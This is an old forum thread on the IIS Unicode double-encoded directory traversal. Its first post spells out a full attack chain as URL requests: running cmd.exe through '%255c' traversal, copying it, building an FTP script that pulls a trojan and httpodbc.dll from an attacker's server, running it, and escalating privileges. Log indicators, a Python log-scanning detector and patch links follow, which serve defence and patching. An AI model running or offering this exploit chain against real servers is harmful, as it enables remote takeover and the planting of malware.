
Thread: Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX

  1. #1

    Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX

    I had to add quotes and such because this BBS is messing with some stuff......

    I will try my best to use complete sentences, like I learned in 3rd grade.

    I KNOW THIS IS AN OLD VULN, BUT MANY MANY MACHINES ARE STILL HACKED THIS WAY, SO I'M POSTING IT. Please patch yourselves....


    Disclaimer: none of this information is to be used out of context. I am not responsible for how you use it, or what your mind chooses to do with it. Furthermore, it is educational, and for that purpose only.

    First I will start with how it is done, then how it is used, then how to defend, and lastly, how to fix.

    The first step in hacking IIS unicode vuln machines, those vulnerable to the ../../..%255c../winnt/system32/cmd.exe type vulns, is finding them. Usually this is done with a custom scanner, or by someone using other systems. The scanner starts by identifying the host computer; it usually tries random hosts and marks which ones return IIS 4.0 or IIS 5.0. After this part of the scan is complete, each host is scanned for some 200 unicode vuln strings. Which ones they find will determine how the host is exploited. So, let's get into it.

    Let's say you're doing this on yourself... (you're the attacker)

    http://127.0.0.1/

    After you scan for vulnerable unicode strings, you see yourself as being vulnerable to

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe

    which means your system is not secure against the unicode directory traversal, and thus you can access a cmd prompt through it. At this point the attacker (I will refrain from using "hacker", because it hardly is) will do a basic call of cmd.exe, something like


    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+dir+c:\

    which would display the contents of your C:\ drive.

    Next, the attacker (you) would create your own copy of cmd.exe, so you don't have to deal with copy attribute problems.

    something like...

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe

    Next, there are two different ways to get the files they want onto your computer. One is too simple to explain: using tftp.exe and remotely downloading from a TFTP server. But it is not the most popular, for the simple reason that it is harder to set up.

    Instead, the next thing the attacker will do is create an ftp script to download files for you. Using echo commands, we create an ftp script.

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt

    tempftp being the ftp server on which the files lie, 21 being the port

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+login+>>+C:\inetpub\scripts\temp.txt

    login = ftp login info

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+password>>+C:\inetpub\scripts\temp.txt

    password = ftp pass info

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+temp.zip+>>+C:\inetpub\scripts\temp.txt

    downloading the trojan/bot file (this line, like the others, appends to the ftp script temp.txt, not to temp.zip).

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+httpodbc.dll+>>+C:\inetpub\scripts\temp.txt

    httpodbc.dll is a common priv escalation exploit

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+exit+>>+C:\inetpub\scripts\temp.txt

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+quit+>>+C:\inetpub\scripts\temp.txt

    must quit and exit, or else the process hangs

    then, to send the command to download, simply use...

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+ftp.exe+-s:C:\inetpub\scripts\temp.txt

    and ftp.exe will use your script and download all your files.

    Next, the attacker will log on to wherever they have placed their files, in our case C:\inetpub\scripts\temp.txt. The file must be accessible from the web..., but most are...

    http://127.0.0.1/scripts/httpodbc.dll

    They enter the command to run, in our case

    C:\inetpub\scripts\temp.zip (can be an exe if self extracting)

    httpodbc.dll returns a positive, reporting that privs were escalated for the execution.

    This computer can now be completely controlled and used however the attacker wants. Some IIS servers run connected to T3s as well, so lots of bandwidth wasting.

    I won't go into any more about how they are hacked for fear of being banned...
    I will answer more in-depth questions in private messages...



    Catching The attack:

    The easiest way to prevent this attack is simple updates, which some don't use. There are many fixes for this problem, but still thousands of machines are attacked. You may notice your computer moving very slowly, or using unusual amounts of bandwidth. Another way, if you want to backtrack and see when you were attacked, is to look in the IIS logs for anything resembling

    Get /.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe 200

    If it is a 404 instead of a 200, then you are fine; a 200 simply means it returned positive.



    What the hell are these used for?:

    The most common thing these machines are used for is serving warez/porn. I have seen other, more sophisticated things, such as BNCs, tunnels, IRC servers, FXP servers, e-mail hosts, and just about as much as you can imagine.


    The most secure way to fix this problem: if you aren't infected, update; if you are, you most likely need to clean your whole system. Treat it as any other compromise.


    BOTTOM LINE:

    Please upgrade this stuff. It's been out for almost 2 years, and I'm getting tired of seeing them online. Just because you're behind a firewall doesn't mean you're safe from lame old attacks either....
    sectac
    The Hack Back Revolution
    irc.dal.net:#guesswhatyourhacked
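    The log check described in the post above, worked out as an added example (this is not code from the original post or from its author). It decodes each cs-uri-stem twice, the way the vulnerable IIS did, which is why %255c reaches the file system as a backslash even though it contains no traversal after one decode; it flags the traversal together with cmd.exe/ftp.exe use and "/c+" style queries, and reads the status code the way the author suggests: 200 means the request worked, anything else was only a probe. The field names are the IIS W3C extended log format; the log lines themselves are constructed for the example.

```python
"""Added example (not from the original post): scan IIS W3C log lines for the
double-encoded ("%255c") traversal described above and tell probes from hits.
The log lines below are constructed for this example, not real server logs."""
import re
from urllib.parse import unquote

# Constructed sample of IIS 5.0 W3C extended log output (not from a real server).
SAMPLE_LOG = r"""
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-10-12 03:14:07 10.0.0.5 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-10-12 03:14:09 10.0.0.5 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe 200
2001-10-12 03:14:20 10.0.0.5 GET /scripts/..%255c../inetpub/scripts/temp.exe /c+ftp.exe+-s:C:\inetpub\scripts\temp.txt 200
2001-10-12 03:15:00 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-10-12 03:16:11 10.0.0.7 GET /default.asp - 200
"""

# ".." bounded by a slash of either kind once the path is fully decoded.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# The two classic overlong UTF-8 encodings of '/' (%c0%af) and '\' (%c1%9c)
# from the MS00-078 bug; a plain UTF-8 decode turns them into U+FFFD, so
# they are matched on the raw stem instead.
OVERLONG = re.compile(r"%c0%af|%c1%9c", re.I)
# Binaries the post shows the attacker running through the traversal.
LIVING_OFF_THE_LAND = re.compile(r"(cmd|ftp|tftp)\.exe$", re.I)


def decode_like_iis(stem):
    """Mimic the bug behind %255c: IIS decoded the URL once for its checks and
    a second time before touching the file system, so %255c -> %5c -> '\\'."""
    first = unquote(stem)
    second = unquote(first)
    return first, second


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields is None or len(parts) != len(fields):
            continue  # skip malformed records rather than guess at them
        yield dict(zip(fields, parts))


def analyze(entry):
    """Return (severity, reasons) for one record; severity is None if clean."""
    stem = entry["cs-uri-stem"]
    first, second = decode_like_iis(stem)
    reasons = []
    if TRAVERSAL.search(second) and not TRAVERSAL.search(first):
        reasons.append("double-encoded traversal")
    elif TRAVERSAL.search(first):
        reasons.append("encoded traversal")
    if OVERLONG.search(stem):
        reasons.append("overlong UTF-8 traversal")
    if LIVING_OFF_THE_LAND.search(second):
        reasons.append("shell/ftp binary")
    if entry["cs-uri-query"].lower().startswith("/c+"):
        reasons.append("cmd-style query")
    if not reasons:
        return None, reasons
    # As the post says: a 200 means the request worked; anything else was a probe.
    severity = "likely success" if entry["sc-status"] == "200" else "probe"
    return severity, reasons


def scan_log(text):
    """Run analyze() over a whole log and keep only the suspicious records."""
    findings = []
    for entry in parse_w3c(text):
        severity, reasons = analyze(entry)
        if severity:
            findings.append({"ip": entry["c-ip"], "stem": entry["cs-uri-stem"],
                             "status": int(entry["sc-status"]),
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:14} {f['ip']:10} {f['status']} {', '.join(f['reasons'])}")
```

    On the sample above the three 200 records from 10.0.0.5 come out as "likely success" and the %c0%af request that got a 404 as a "probe". Note that the copied cmd.exe (temp.exe) is not caught by the binary name list; it is the "/c+" query and the traversal in the stem that flag that record, which is why the script checks all three rather than only the file name.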

  2. #2
    Senior since the 3 dot era | Join Date: Nov 2001 | Posts: 1,542

    Good post, perhaps useful to include the links to the patches or sources?

    Folder traversal patch
    http://www.microsoft.com/technet/sec...n/MS00-078.asp

    IIS 5.0 patch
    http://www.microsoft.com/windows2000...62/default.asp

    IIS 4.0 patch
    http://www.microsoft.com/ntserver/nt...62/default.asp

    MS extended unicode bug, vulnerable systems list
    http://www.securityfocus.com/bid/1806

    thecorpz.org had a good tutorial with many links about these unicode risks, but that site has no contents anymore; however, Google cache can be helpful.
